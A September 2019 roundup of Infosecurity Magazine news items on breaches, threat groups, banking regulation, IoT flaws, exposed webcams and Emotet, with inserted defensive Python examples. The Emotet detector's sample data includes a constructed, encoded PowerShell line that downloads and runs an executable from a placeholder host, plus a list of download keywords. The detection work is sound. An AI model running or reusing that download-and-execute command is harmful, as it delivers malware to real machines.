Info Security


FS-ISAC and Europol Partner to Combat Cross-Border Cybercrime

Thu, 09/19/2019 - 10:00

The Financial Services Information Sharing and Analysis Center (FS-ISAC) and Europol’s European Cybercrime Centre (EC3) have announced a partnership to combat cybercrime within the European financial services sector.

The FS-ISAC is an industry consortium dedicated to reducing cyber-risk in the global financial system, and the EC3 protects European citizens, business and governments from online crime.

The Memorandum of Understanding (MOU) between the two will aim to facilitate and enhance the law enforcement response to financially motivated cyber-criminals targeting banks and other financial institutions through a symbiotic intelligence sharing network.

The partnership is a response to the acceleration of sophisticated cyber-attacks in recent years affecting numerous countries and jurisdictions at once. The MOU will help foster a pan-European approach to intelligence sharing, ensuring the cross-border cooperation necessary for the detection, prevention and reduction of cybercrime. In addition to facilitating information sharing, the agreement will also enable education and resilience through training exercises and informational summits.

“Cyber-criminals are increasingly targeting financial services and institutions to the cost of citizens and businesses across the EU,” said Steven Wilson, head of EC3. “It is crucial to bring key stakeholders around the table to improve the coordinated response; this MOU with FS-ISAC builds a platform to allow us to do exactly that.”

Ray Irving, managing director of FS-ISAC, added: “Accelerated global digitalization combined with the growing sophistication of cyber-criminals demands a more concerted approach from both the public and private sector. Through a collaborative peer-to-peer network, FS-ISAC and EC3 are enabling intelligence sharing to better safeguard the global financial system.”

Categories: Cyber Risk News

NCSC: Nation State University Attacks Could Harm UK

Thu, 09/19/2019 - 09:30

The UK’s National Cyber Security Centre (NCSC) has been forced to issue a new report detailing the threat to the country’s universities from cyber-criminals and nation state operatives.

The NCSC argued that, while the sector has traditionally been one of the most open and outward-facing, both in terms of culture and technology, this makes the attackers’ job even easier.

The main threats are from untargeted cybercrime raids, such as ransomware and bulk personal info theft via phishing, and targeted ones like Business Email Compromise (BEC). However, it also highlighted the challenge posed by nation state hackers looking to steal cutting-edge research and IP.

“While it is highly likely that cybercrime will present the most evident difficulties for universities, state-sponsored espionage will likely cause greater long-term damage. This is particularly true for those universities which prize innovation and research partnerships. This damage will extend to the UK’s larger national interest and to those researchers whose work may give others the chance to 'publish first',” the report argued.

“Nation states almost certainly target universities for the data and information they hold. Cyber offers a deniable route to obtain information that is otherwise unavailable to them. It is likely exploited instead of, or in conjunction with, traditional routes to gain access to research, such as partnering, ‘seconded students’, or direct investment.”

The NCSC warned that attacks on UK universities by nation states could even threaten the long-term health of the country itself.

“There's a realistic possibility that the threat will increase in line with increased scrutiny of foreign direct investment and the minimizing of other avenues to gain insight and advantage,” it added.

The GCHQ spin-off urged university IT teams to focus on three things: improving user security awareness; enhancing access controls, especially for sensitive data stores; and revisiting network design to segment high-value information.

Iranian hackers have been among the most prolific attackers of university IT systems: just last week more info emerged on the Cobalt Dickens group, which is targeting at least 380 universities worldwide in a major new phishing operation.


Lion Air Breach Hits Millions of Passengers

Thu, 09/19/2019 - 08:40

Tens of millions of passengers from at least two Asian airlines have had their personal data compromised after workers at the parent company left them exposed via an AWS server, it has emerged.

Although it’s unclear how long the data had been exposed for, security researchers have pointed to at least 35 million records circulating online and linked to an individual with the moniker “Spectre.”

They belong mainly to passengers of Lion Air companies Malindo Air and Thai Lion Air, and include names, dates of birth, phone numbers, emails, addresses, passport numbers and expiration dates, and more.

There are suggestions that a third Lion Air brand, Batik Air, may also be affected.

An official statement from Malindo Air reveals little except that, along with AWS and the airline’s e-commerce partner GoQuo, it is investigating.

“Malindo Air has put in adequate measures to ensure that the data of our passengers is not compromised in line with the Malaysian Personal Data Protection Act 2010. We also do not store any payment details of our customers in our servers and are compliant with the Payment Card Industry (PCI) Data Security Standard (DSS),” it claimed.

“We are in the midst of notifying the various authorities both locally and abroad including CyberSecurity Malaysia. Malindo Air is also engaging with independent cybercrime consultants to investigate and report into this incident.”

The firm urged its passengers to change passwords on their Malindo Miles accounts and basically sit tight.

Reports suggest a misconfigured S3 bucket was again responsible for the security snafu, perhaps dating back to August.

Airlines are an increasingly popular target for hackers, with both Cathay Pacific and BA suffering major breaches over the past year.

The mistake or oversight that led to the Lion Air breach was most likely a very simple one, argued Stephan Chenette, co-founder and CTO of AttackIQ.

“Companies must do a better job at proactively securing sensitive data, starting with the basics and then building to more mature programs,” he added.

“To protect customer data, organizations should employ continuous security validation tools to identify and prioritize gaps in security that need to be addressed first, and continuously assess the viability of their security controls to make sure they are enabled, configured correctly and operating effectively at all times.”



Barclaycard: So Far, So Good for Strong Customer Authentication

Wed, 09/18/2019 - 17:16

Barclaycard has reported no negative impact from introducing Strong Customer Authentication (SCA) last weekend. 

The new user authentication rules mandated by the European Union's revised Payment Services Directive (PSD2) were introduced by the UK's leading acquirer on Saturday, September 14. 

Barclaycard analyzed transaction data from September 14 and 15 to check what effect the new two-step authentication rules were having. The company found that merchants had not experienced an increase in abandoned transactions, nor had they seen a spike in declined payments.  

"Our data offers encouraging news for merchants, whose transaction volumes have been, so far, unaffected by the go-live of SCA," said Paul Adams, director of acquiring at Barclaycard Payment Solutions.

SCA legislation officially came into force across Europe on September 14; however, the European Banking Authority (EBA) has given each member state the option to apply for extensions. 

One country that took them up on the offer was the UK, which secured an 18-month extension to the deadline. The UK's financial regulator, the Financial Conduct Authority (FCA), announced in August that the country's payments and e-commerce providers would have until March 14, 2021 to achieve full compliance. 

Action will not be taken by the FCA before that date against firms that haven't implemented SCA, provided that "there is evidence that they have taken the necessary steps to comply with the plan." However, the FCA is expecting third-party providers to implement SCA for online banking by March 14, 2020.

The new SCA legislation requires that all European Economic Area (EEA) transactions go through a two-factor authentication process, unless they qualify for an exemption. Transactions that are exempt include contactless payments below €50/£30; payments made at unattended terminals, such as parking lot payment machines; and recurring payments of the same value to the same merchant, such as subscription payments.

Customers can also skip two-factor authentication for payments made to trusted merchants by whitelisting that merchant with their issuer. 

To help merchants prepare for the changes required by SCA, Barclaycard, which handles nearly half of the nation’s credit and debit card transactions, has launched Barclaycard Transact, which went live over the weekend.

The fraud protection solution allows businesses to benefit from SCA exemptions while making sure that all high-risk transactions still go through two-factor authentication, in accordance with the regulation.

Adams said: "We have designed Transact to help our customers get the most out of the incoming regulation, by enabling them to provide a smooth payment experience for their shoppers, while at the same time reducing risk and managing fraud."


New Attack Group Targets Saudi IT Providers

Wed, 09/18/2019 - 15:50

A previously undocumented threat group has been mounting what appear to be supply-chain attacks against IT providers in the Middle East.

Since July 2018, Tortoiseshell Group has targeted at least 11 organizations, using a deadly mix of custom-made and off-the-shelf malware. The majority of the companies to come under virtual fire are based in Saudi Arabia.

Tortoiseshell's nefarious activities were spotted by researchers at Symantec, who have recorded activity stemming from the group as recently as July 2019. 

At two of the organizations unfortunate enough to be attacked by Tortoiseshell, several hundred network computers ended up being infected with malware. Researchers believe that this unusually large number of compromised consoles is indicative of the group's desire to infiltrate particular computers. 

The exact intentions of the attackers are unknown, though Symantec's researchers believe that the threat group's end goal was to compromise the computers belonging to the customers of the IT firms targeted. And you can bet that they weren't going to all this trouble just to change people's screensavers to a goofy picture of an adorable puppy. 

Evidence gathered by the researchers suggests that the attackers were able to gain domain admin–level access to the networks of at least two of the IT providers upon which they preyed.  

Gavin O'Gorman, an investigator with Symantec Security Response, said: "Tortoiseshell deployed its information-gathering tools to the Netlogon folder on a domain controller, on at least two victim networks. This results in the information-gathering tools' being executed automatically when a client computer logs into the domain. 

"This activity indicates the attackers had achieved domain admin–level access on these networks, meaning they had access to all machines on the network."

Highlighting the inherent danger in hackers' gaining access at this level, O'Gorman said: "Shamoon is a good example of one of the worst-case scenarios, where an attacker can wipe every computer on a network by obtaining domain-level access."

The unique component used by Tortoiseshell is a piece of malware called Backdoor.Syskit, which is run with the "-install" parameter to install itself. Once it has settled its virtual butt on the couch of a computer, the malware collects and sends the machine’s IP address, operating system name and version, and MAC address to the C&C server. 

Tortoiseshell's last observed activity occurred in July, but there's every chance they'll be back for more.

O'Gorman said: "Groups tend to not go away, but rather they use different tools, and so it becomes difficult to connect their various attacks. For some groups we have been able to identify their activity spanning more than 10 years."


US Cybersecurity Firm to Create 52 Jobs in Ireland

Wed, 09/18/2019 - 15:16

An American cybersecurity consulting firm has opened its first overseas site in the southern Irish city of Kilkenny.

The new office in the Republic of Ireland will become the European headquarters and Security Operations Centre (SOC) for the growing company Security Risk Advisors (SRA). The SOC's current staff of three will grow to seven by mid-October and is expected to swell to 52 over the next five years.

Having an office in Europe allows SRA to offer around-the-clock system monitoring to its US-based clients. It will also help the company support its growing European clientele and is likely to attract new customers east of the Atlantic. 

SRA's managing director, Tim Wainwright, said: "The proximity to top colleges and industry-leading companies, in addition to the quality of life in the South East region, made the decision to open our first international office in Kilkenny an easy one."

Wainwright has already chosen his favorite local watering hole, and the honor goes to Cleere’s Bar & Theatre in Kilkenny’s Irishtown. 

Support for SRA's international expansion is being provided by Ireland's inward investment promotion agency, the IDA.

"The IDA walked us through incentives and hosted our initial visit. They introduced us to local stakeholders and helped us fill out paperwork. They have continued to work with us in support of setting up our office," said SRA’s Amanda Larsen. 

Irish minister of state at the Department of Housing, Planning, and Local Government, John Paul Phelan TD, said: "The decision to locate their office here is testament to Kilkenny’s highly skilled workforce, as well as its strong network of nearby educational institutions like Waterford IT and Carlow IT, which provide companies like SRA with the talent they need to succeed and grow.

"This announcement is a great boost for the city, and I wish SRA every success in Kilkenny."

SRA was founded as a virtual organization in Pennsylvania's largest city, Philadelphia, back in 2010, by a home-grown team of four Philly locals. Since then, the company has grown 20% on average every year and now employs around 140 people.

The company's growth strategy of mentoring a large number of university hires was so successful that in 2017 SRA opened a physical office on the city's Market Street. 

Two years of success followed, causing SRA to outgrow its original space. In June of this year the company announced the expansion of its office in Philadelphia to accommodate 25 additional employees, together with the opening of a new site in Rochester, New York.

Indicating that SRA plans to implement a similar growth strategy at their new European HQ, Larsen said: "We will be working closely with the Waterford Institute of Technology and Institute of Technology Carlow. The South East region has such a great amount of tech talent."


Government Report Warns of AI Policing Bias

Wed, 09/18/2019 - 11:05

A new government-backed report has warned that the growing use of automation and machine learning algorithms in policing could be amplifying bias, in the absence of consistent guidelines.

Commissioned by the Centre for Data Ethics and Innovation (CDEI), which sits in the Culture Department, the report from noted think tank the Royal United Services Institute (RUSI) will lead to formal recommendations in March 2020.

It’s based on interviews with civil society organizations, academics, legal experts and police themselves, many of whom are already trialing technology such as controversial AI-powered facial recognition.

The report claimed that use of such tools, and those used in predictive crime mapping and individual risk assessments, can actually amplify discrimination if they’re based on flawed data containing bias.

This could include over-policing of certain areas and a greater frequency of stop and search targeting the black community.

It also warned that the emerging technology is currently being used without any clear over-arching guidance or transparency, meaning key processes for scrutiny, regulation and enforcement are missing.

RUSI claimed that police forces need to carefully consider how algorithmic bias may result in them policing certain areas more heavily, and warned against over-reliance on technology which could reduce the role of case-by-case discretion. It also said that discrimination cases could be brought by individuals unfairly “scored” by algorithms.

“Interviews conducted to date evidence a desire for clearer national guidance and leadership in the area of data analytics, and widespread recognition and appreciation of the need for legality, consistency, scientific validity and oversight,” the report concluded.

“It is also apparent that systematic investigation of claimed benefits and drawbacks is required before moving ahead with full-scale deployment of new technology.”

OpenText head of AI and analytics, Zach Jarvinen, argued that the best way of avoiding bias in AI is to implement “ethical code” at the data collection phase.

“This must begin with a large enough sample of data to yield trustworthy insights and minimize subjectivity. Thus, a robust system capable of collecting and processing the richest and most complex sets of information, including both structured data and unstructured, and textual content, is necessary to generate the most accurate insights,” he added.

“Data collection principles should be overseen by teams representing a rich blend of views, backgrounds, and characteristics (race, gender, etc.). In addition, organizations should consider having an HR or ethics specialist working in tandem with data scientists to ensure that AI recommendations align with the organization’s cultural values.”


Third of Brits Concerned About Election Interference

Wed, 09/18/2019 - 09:55

A third of British adults are concerned about hackers interfering in future general elections or referendums, according to new research from SANS Institute.

The global IT training organization polled over 2000 individuals to better understand their concerns about the impact of cyber-related issues on society.

It found that 34% believe cyber-attackers could influence the democratic process in future.

A long-awaited parliamentary committee report issued earlier this year claimed that while it was difficult to say definitively if there was "successful" interference in the 2016 EU referendum, “there is, however, strong evidence that points to hostile state actors influencing democratic processes.”

Russia in particular came under scrutiny for the pro-leave propaganda circulated by its state-backed media outlets RT and Sputnik.

Election interference can also be more insidious: a US Senate report published in July argued that Russian hackers likely compromised voting infrastructure in all 50 states ahead of the 2016 presidential election.

Just a fifth of UK adults responding to the SANS Institute poll said they thought the UK is well prepared to defend itself against future cyber issues, and nearly half (45%) said there are not enough security experts in the workforce to protect the country from attack.

However, less than one in 10 (6%) said they thought being a cybersecurity professional was an important job in society, highlighting the major PR challenge facing the industry in trying to get more people to consider a career in the sector.

Skills shortages currently stand at nearly three million globally, including 142,000 in EMEA, according to (ISC)².

SANS Institute CTO, James Lyne, argued that it is the role of government, industry and parents and teachers to emphasize the important role cybersecurity professionals play in defending democracy and economic growth.

“The findings of the poll demonstrate a lack of awareness of what cybersecurity practitioners do to protect our national interests, economy and personal finances,” he added. “The UK will only be prepared to cope with the evolving geopolitical cyber-frontier if we can educate and nurture greater numbers of cyber-defenders and instil a sense of urgency in that new generation of cybersecurity professionals.”

The research was conducted to promote the beginning of the latest annual Cyber Discovery program, which aims to educate and inspire 13-18-year-olds in the UK to be the cybersecurity stars of tomorrow.


US Government Sues Edward Snowden Over Book

Wed, 09/18/2019 - 08:45

The US government is suing Edward Snowden for violating a non-disclosure agreement (NDA) in the publication of a new book.

The civil suit alleges that the former government contractor published the book, Permanent Record, without first submitting it to the CIA and NSA for review, as per the agreements he signed. It alleges Snowden has also discussed intelligence matters in public speeches, further violating the NDA.

Yet despite its allegations, the US government doesn’t want to prevent publication of the book; instead it wants to seize all proceeds, naming his publishers as co-defendants so that no money can be transferred to the whistleblower.

“Edward Snowden has violated an obligation he undertook to the United States when he signed agreements as part of his employment by the CIA and as an NSA contractor,” said assistant attorney general Jody Hunt of the Department of Justice’s Civil Division.

“The United States’ ability to protect sensitive national security information depends on employees’ and contractors’ compliance with their non-disclosure agreements, including their pre-publication review obligations. This lawsuit demonstrates that the Department of Justice does not tolerate these breaches of the public’s trust. We will not permit individuals to enrich themselves, at the expense of the United States, without complying with their pre-publication review obligations.”

However, Snowden’s attorney and director of the American Civil Liberties Union (ACLU), Ben Wizer, has hit back, arguing that the book contains no information that hasn’t already been published by “respected news organizations.”

“Had Mr Snowden believed that the government would review his book in good faith, he would have submitted it for review. But the government continues to insist that facts that are known and discussed throughout the world are still somehow classified,” he added.

“Mr Snowden wrote this book to continue a global conversation about mass surveillance and free societies that his actions helped inspire. He hopes that today’s lawsuit by the United States government will bring the book to the attention of more readers throughout the world.”


New Banking Regs Increase Cyber-Attack Risk

Tue, 09/17/2019 - 17:09

A report released today by Trend Micro has found that new European open-banking rules could leave financial services organizations and their customers more susceptible to cyber-attacks.

The European Union’s Revised Payment Services Directive (PSD2) is designed to give users greater control over their financial data and the option to carry out open banking via a new breed of innovative fintech firms. According to Trend Micro's research, that increased control could come at a heavy cost. 

Vulnerabilities that could be exploited as a result of the EU's PSD2 include public APIs that allow approved third parties to access users' banking data and mobile apps that contain transactional data that could make users targets for phishing attacks.

Another concern raised by the report pertained to financial technology (fintech) firms that have no record on data protection and lack the resources of big banks.

In a quick survey of open-banking fintechs, Trend Micro found them to have an average of 20 employees and no dedicated security professionals. The report suggests that such setups make these fintechs ideal targets for attackers and raise concerns over security gaps in their mobile apps, APIs, data-sharing techniques, and security modules that could be incorrectly implemented.

Bharat Mistry, principal security strategist at Trend Micro, told Infosecurity Magazine: "The worst-case scenario here is that cyber-criminals could very easily develop malicious fake apps, especially for mobile smartphone devices where the App Store provider hasn’t taken sufficient measures to validate the source of the application. Then, using phishing campaigns, hackers could direct users to download and use malicious apps, thereby exposing banking credentials to prying eyes."

Open banking comes with the additional challenge of how and to whom blame should be ascribed when cybercrimes do inevitably occur.   

Mistry said: "Another aspect of this evolving open-banking world is the increasing complexity of proving responsibility when a fraudulent transaction occurs. The fault can potentially lie with the bank, the user, or the third-party provider; how smoothly will communication between these three parties go to resolve any such incident?"

Wherever the blame may lie, Mistry expects customers of financial services providers will expect their providers to shoulder the responsibility of maintaining cybersecurity. 

He said: "Cyber insurance is proving to be popular with organizations who want to offset their cyber liabilities; unfortunately, I cannot see individuals taking out such policies as most people are reluctant to pay for something that they think the service provider or bank should be taking care of."


Vulnerabilities in IoT Devices Have Doubled Since 2013

Tue, 09/17/2019 - 16:55

A follow-up study into the security of IoT devices has revealed more than twice the number of vulnerabilities as were detected six years ago. 

In the 2013 study SOHOpelessly Broken 1.0, researchers at Independent Security Evaluators (ISE) highlighted 52 vulnerabilities across 13 SOHO wireless routers and network-attached storage (NAS) devices made by vendors including Asus and Belkin.

An examination of routers and NAS products by ISE published yesterday has flagged 125 vulnerabilities with CVE (Common Vulnerabilities and Exposures) identifiers. The vulnerabilities captured by the new research, dubbed SOHOpelessly Broken 2.0, could affect millions of IoT devices.

For their latest study, ISE tested 13 contemporary IoT devices created by a range of manufacturers. Modern versions of several devices tested in the original 2013 study were also studied to determine whether manufacturers had upped their security game.

The results were fairly disappointing, with researchers able to obtain remote root-level access to 12 of the 13 devices tested. Among the weaknesses identified were buffer overflow issues, command injection security flaws, and cross-site scripting (XSS) errors.

"We were expecting to find issues in the devices; however, the number and severity of the issues exceeded those expectations. Our first reaction to a lot of our findings was: 'It can't really be this easy, right?'" said ISE researcher Joshua Meyer. 

Conducting the study has changed how Meyer uses IoT devices. He said: "I will be more selective of any IoT devices I purchase for personal use. I am also more aware of the features provided by my devices and disable all of the ones that aren't necessary to its security."

After completing the study, ISE sent vulnerability reports and proof-of-concept (PoC) codes to affected vendors. While the majority of companies acknowledged the reports, TOTOLINK and Buffalo have not yet responded.  

"Netgear and Drobo only responded to us after we continuously messaged them about the critical security issues in their products," said Rick Ramgattie, lead researcher at ISE.

Asked if any plans were afoot for a SOHOpelessly Broken 3.0, Ramgattie said the team is looking into starting a new IoT/Embedded Device research project mid-2020.

Ramgattie elaborated: "We aren't sure if it is going to be the same format as SOHO 1.0 and SOHO 2.0. We might mix things up and pick a smaller set of manufacturers and narrow in on new attack surfaces we have been wanting to dive into for a long time. 

"We might also research more enterprise devices, different protocols, and more complex data-processing workflows."


Nevada Students Top First Official National Cyber League College Rankings

Tue, 09/17/2019 - 15:32

America's National Cyber League (NCL) has published official college rankings for the very first time, and the University of Nevada has come out on top. 

Cyber-savvy students at the Reno-based university prevailed against 5,026 students from 419 schools across the nation to achieve victory in the NCL's spring 2019 season. This impressive win contributed heavily to Nevada's securing the pole position on the inaugural NCL leaderboard published last week.

In second place was the University of Hawaii at Manoa, followed by California State University at Chico, which took third. Lingering at the bottom of the board in 100th place was Grossmont College, a community college in California.  

The NCL has been challenging high school and college students to demonstrate their cybersecurity skills by taking part in two cybersecurity competitions staged annually since 2011. Entrants step onto a virtual field of competition to solve a series of puzzles based on real-world scenarios. 

Previous challenges included identifying hackers from forensic data, breaking into simulated bank websites, and staging a recovery from a ransomware attack. The University of Nevada's winning team, the Nevada Cyber Club, completed all the challenges set in this year's spring season with 99.26% accuracy. 

Club member and computer science and engineering major Bryson Lingenfelter, speaking after his team's unequivocal victory, said: "I've learned a tremendous amount in three seasons of competing in NCL, and it's a major inspiration for my plans going forward with Cyber Club. NCL is how many of us got started with the club, and I hope to expand our use of competitions as learning tools in the future to engage even more people with cybersecurity." 

Competing in the NCL does more for students than simply give them a chance to vaunt their talent and learn new skills. Thanks to industry-leading cybersecurity skills-evaluation technology from Cyber Skyline, NCL competitors can obtain scouting reports of their performance, which they can use for hiring purposes.

"Cyber competitions like NCL provide a way for cybersecurity students to demonstrate their skills to employers, especially with many entry-level jobs requiring experience," said Franz Payer, CEO of Cyber Skyline.

"The new Cyber Power Rankings highlight the top schools producing new cybersecurity professionals. We're excited for what competitions can do to help address the cyber talent shortage."

Categories: Cyber Risk News

New Test Service Launched to Gauge Tech Skills of Job Candidates

Tue, 09/17/2019 - 12:00

A new testing service has been launched with the aim of gauging and ranking job candidates based on their technical skillsets.

TechRank, created by Pioneer Labs and run by technology consultants, sources, tests and ranks technical talent so that companies can hire the most capable person for technology-based roles. It seeks to eliminate the subjectivity of personality and interview charm and to ensure that jobs are offered on the basis of genuine skills.

Candidates take the TechRank test online, opting for the specific area relevant to their skills. They are then logged in the TechRank system and alerted if a suitable job is advertised. Employers can sort candidates by skill level more quickly and accurately than by reading through large numbers of CVs.

TechRank was co-founded by Gurvinder Singh, co-CEO of Pioneer Labs, who explained that it was born out of frustration.

“We were finding it highly time-consuming and difficult to find great tech talent. It was a constant problem. So, we asked ourselves what needed to change and how this could be facilitated – the answer was clearly testing. It’s great for both the candidate and the employer. We trialled the system in our own business and found that it worked really well. It made a huge difference to Pioneer Labs so we decided to create a version that other businesses could use – and TechRank was born.”

Speaking to Infosecurity, Singh said: “We are looking to disrupt tech recruitment. We believe tech recruitment has been broken for far too long. It’s been very difficult for employers to be sure they are hiring people with the right skills; skills that are suitable for the specific job they are being asked to do. Some people look great on paper, perform brilliantly at interview, but simply don’t have the level of knowledge required for the job on offer.

“In the future, I believe CVs will become obsolete in the tech industry. Skills matter more than words and finding the best skilled people is where companies, which are trying to build or maintain market share via technology, will be competing most vigorously.”

Categories: Cyber Risk News

Webcam Security Snafus Expose 15,000 Devices

Tue, 09/17/2019 - 11:00

Researchers have discovered 15,000 private webcams around the globe which could be accessed by anyone with an internet connection, raising serious security and privacy concerns.

Working for Wizcase, white hat researcher Avishai Efrat located exposed devices and camera software from multiple vendors, including: AXIS network cameras; Cisco Linksys webcams; IP Camera Logo Server; IP WebCam; IQ Invision web cameras; Mega-Pixel IP Camera; Mobotix; WebCamXP 5 and Yawcam.

They appear to have been installed by both home users and businesses in multiple countries across Europe, the Americas and Asia.

By failing to put in place even cursory protection on the devices, these owners are exposing not only the webcam streams themselves but also, in some cases where admin access is possible, user information and approximate geolocation. In these cases, Efrat was also theoretically able to remotely control the device view and angle.

Control of such feeds and personal info could allow attackers to rob the premises being monitored, blackmail users, and even steal PII for identity fraud.

The problem lies with the cameras’ remote access functionality. In some cases UPnP was enabled without additional protections like password authentication or IP/MAC address whitelisting, whilst in others unsecured P2P networking was used.

“Webcam manufacturers strive to use technologies which make the device installation as seamless as possible but this sometimes results in open ports with no authentication mechanism set up. Many devices aren’t put behind firewalls, VPNs, or whitelisted IP access – any of which would deny scanners and arbitrary connections,” explained Wizcase web security expert, Chase Williams.

“If these devices have open network services, then they could be exposed.”

Wizcase urged webcam operators to change the default configuration of their device in order to: whitelist specific IP & MAC addresses to access the web camera, add strong password authentication and disable UPnP if P2P networking is being used.

It also advised users to configure a home VPN network so the webcam would no longer be exposed to the public-facing internet.
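The research described above comes down to a simple question per device: what does the camera's web interface return to an unauthenticated request? The following is an added example, not Wizcase's tooling, that classifies the first response into the exposure classes the article describes (open stream, admin UI with no login, Basic auth over cleartext HTTP, or a properly protected endpoint). The Server banner substrings are assumptions based on the product names listed above, and the responses used to exercise it are constructed; `probe()` should only be pointed at devices you own or are authorised to test.

```python
"""Classify a webcam's HTTP interface from its first response: an open stream,
Basic auth over cleartext HTTP, or a properly protected endpoint.

Added example, not Wizcase's tooling. Banner substrings are assumed from the
product names in the report; responses in the test are constructed."""
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Dict

# Substrings of Server banners for camera software named in the report (assumed).
CAMERA_BANNERS = ("webcamxp", "yawcam", "axis", "mobotix", "ip camera", "iq invision")
# Content types a camera returns for a live feed or a still snapshot.
STREAM_TYPES = ("multipart/x-mixed-replace", "image/jpeg", "video/")


@dataclass
class Finding:
    url: str
    severity: str   # critical / high / medium / low / info
    reason: str


def classify(url: str, status: int, headers: Dict[str, str]) -> Finding:
    """Rate exposure from the status code and headers of an unauthenticated GET."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").lower()
    server = h.get("server", "").lower()
    auth = h.get("www-authenticate", "").lower()
    is_camera = any(b in server for b in CAMERA_BANNERS)
    cleartext = url.lower().startswith("http://")

    if status == 200 and ctype.startswith(STREAM_TYPES):
        return Finding(url, "critical", "stream or snapshot served without authentication")
    if status == 200 and is_camera:
        return Finding(url, "high", f"camera web UI ({server}) reachable without authentication")
    if status == 401 and auth.startswith("basic") and cleartext:
        # A login exists, but Basic over plain HTTP sends the password in the clear.
        return Finding(url, "medium", "Basic auth over cleartext HTTP: credentials can be sniffed")
    if status == 401:
        return Finding(url, "low", "authentication required")
    if status in (403, 404):
        return Finding(url, "info", "access denied or no interface at this path")
    return Finding(url, "info", f"unclassified response {status}")


def probe(url: str, timeout: float = 5.0) -> Finding:
    """Fetch `url` once (only against devices you own or are authorised to test)."""
    req = urllib.request.Request(url, headers={"User-Agent": "camera-audit/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(url, resp.getcode(), dict(resp.headers))
    except urllib.error.HTTPError as e:
        # 401/403/404 arrive as exceptions; the headers are still what we need.
        return classify(url, e.code, dict(e.headers))


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        f = probe(target)
        print(f"{f.severity:8} {f.url}  {f.reason}")
```

Run it as `python camera_audit.py http://camera.lan/` against your own device; a "medium" result means the password the article recommends is in place but should be paired with HTTPS or a VPN, and anything "high" or "critical" means the camera is effectively public.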

Categories: Cyber Risk News

Emotet is Back and Spamming Again

Tue, 09/17/2019 - 09:45

A notorious botnet has begun sending out spam again after a several-month hiatus, which could spell bad news for organizations around the world.

Emotet had been dormant for around four months, but started pumping out spam on Monday morning, with phishing emails sent in German, Polish, English and Italian, according to Malwarebytes.

The firm said that an uptick in command-and-control (C2) server activity forewarned it of a return to the front line for the infamous botnet.

In this new campaign, users are tricked into opening an attached document and enabling macros, triggering a PowerShell command which will try to download Emotet from compromised sites, often those running WordPress.
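The chain just described (Office document, enabled macro, PowerShell downloader) leaves a distinctive trace in process-creation telemetry: an Office executable as the parent of a script host, usually with an encoded command line. The following is an added example, not Malwarebytes' detection logic, that runs that check over process-creation events with Sysmon event ID 1 style fields and decodes any `-EncodedCommand` payload so the URL and download method can be read. The events in `SAMPLE_EVENTS` are constructed and the URL in them is a placeholder.

```python
"""Flag Office applications spawning a script host and decode PowerShell
-EncodedCommand payloads, over process-creation events (Sysmon event ID 1 fields).

Added example for the macro-to-PowerShell downloader chain described above; not
Malwarebytes' detection logic. SAMPLE_EVENTS are constructed; the URL is a placeholder."""
import base64
import re
from typing import Dict, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# -e, -ec, -enc and -EncodedCommand all take base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                          re.IGNORECASE)
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "net.webclient", "bitsadmin", "http://", "https://")


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(event: Dict[str, str]) -> Optional[Dict]:
    """Return a finding when an Office process spawns a script host, else None."""
    parent, child = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = (decoded or cmdline).lower()        # inspect the decoded script if there is one
    indicators = [h for h in DOWNLOAD_HINTS if h in text]
    return {"host": event.get("Computer"), "parent": parent, "child": child,
            "decoded": decoded, "downloader": bool(indicators), "indicators": indicators}


def run(events: List[Dict[str, str]]) -> List[Dict]:
    return [f for f in (analyse(e) for e in events) if f]


# Constructed events: one Emotet-style chain, one benign admin script launched
# from Explorer, and one Excel-spawned cmd.exe with no download in it.
_STAGE1 = ("$w=New-Object Net.WebClient;"
           "$w.DownloadFile('http://example.invalid/wp-content/x.exe',$env:TEMP+'\\x.exe');"
           "Start-Process ($env:TEMP+'\\x.exe')")
SAMPLE_EVENTS = [
    {"Computer": "WS-042",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -ep bypass -enc " + encode_command(_STAGE1)},
    {"Computer": "WS-042",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Computer": "WS-017",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo refreshing"},
]

if __name__ == "__main__":
    for f in run(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['parent']} -> {f['child']} "
              f"downloader={f['downloader']} {f['indicators']}")
```

The parent/child pair alone is the high-signal part; the decoder exists because the `-w hidden -nop -ep bypass -enc` pattern hides the URL and the `DownloadFile` call from any rule that only greps the raw command line.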

“Once installed on the endpoint, Emotet attempts to spread laterally, in addition to stealing passwords from installed applications. Perhaps the biggest threat, though, is that Emotet serves as a delivery vector for more dangerous payloads, such as ransomware,” warned Malwarebytes.

“Compromised machines can lay in a dormant state until operators decide to hand off the job to other criminal groups that will attempt to extort large sums of money from their victims. In the past, we’ve seen the infamous Ryuk ransomware being deployed that way.”

